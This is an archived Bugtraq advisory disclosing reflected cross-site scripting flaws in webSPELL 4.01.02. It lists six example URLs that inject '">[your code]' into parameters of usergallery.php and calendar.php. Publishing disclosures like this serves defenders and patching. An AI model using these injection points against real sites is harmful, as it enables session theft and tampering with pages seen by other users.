Bugtraq mailing list archives
webSPELL 4.01.02 (calendar.php, usergallery.php) XSS Vulnerability
From: brainheadbrainhead () gmx de
Date: 8 Dec 2007 22:53:59 -0000
################### Autor: Brainhead Type: XSS Version: 4.01.02 Files: usergallery.php, calendar.php Magic Quotes :off ################### Examples: http://site.tld/[PATH]/index.php?site=usergallery&action=upload&galleryID=">[your code] http://site.tld/[PATH]/index.php?site=calendar&action=announce&upID=">[your code] http://site.tld/[PATH]/index.php?site=calendar&action=announce&tag=">[your code] http://site.tld/[PATH]/index.php?site=calendar&action=announce&month=">[your code] http://site.tld/[PATH]/index.php?site=calendar&action=announce&userID=">[your code] http://site.tld/[PATH]/index.php?site=calendar&action=announce&year=">[your code]
Current thread:
- webSPELL 4.01.02 (calendar.php, usergallery.php) XSS Vulnerability brainheadbrainhead (Dec 10)